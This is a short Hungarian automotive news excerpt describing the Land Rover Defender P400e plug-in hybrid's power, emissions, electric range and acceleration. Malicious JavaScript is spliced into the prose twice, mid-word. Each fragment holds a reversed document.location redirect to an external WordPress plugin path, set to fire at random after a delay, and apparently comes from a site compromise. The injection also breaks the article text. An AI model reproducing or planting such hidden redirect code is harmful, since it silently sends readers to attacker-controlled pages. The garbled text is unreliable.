Egy kétliteres benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor és egy villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor párosa mozgatja a Land Rover Defender P400e modellt, az ikonikus terepjáró plug-in hibrid kivitelét. Az összteljesítmény 404 lóerő, ami a széria legerősebb tagjává teszi a hibrid modellt. És persze a legtisztábbá is: az átlagos CO2-kibocsátás 74 g/km, az átlagfogyasztás 3,3 l/100 km, szerencsés esetben pedig akár 43 kilométert is megtehetünk tisztán elektromos hajtással. Külön öröm, hogy a full elektromos üzem terepen, felezőt kapcsolva is igénybe vehető, így a Defenderrel minden eddiginél tisztább lelkiismerettel vághatunk neki a vadonnak. Az 5,6 másodperces 0-100 km/óra gyorsulást felmutató modell öt- vagy hatszemélyes kivitelben elérhető. Habár nem ekkora szenzáció,…
- Hirdetés -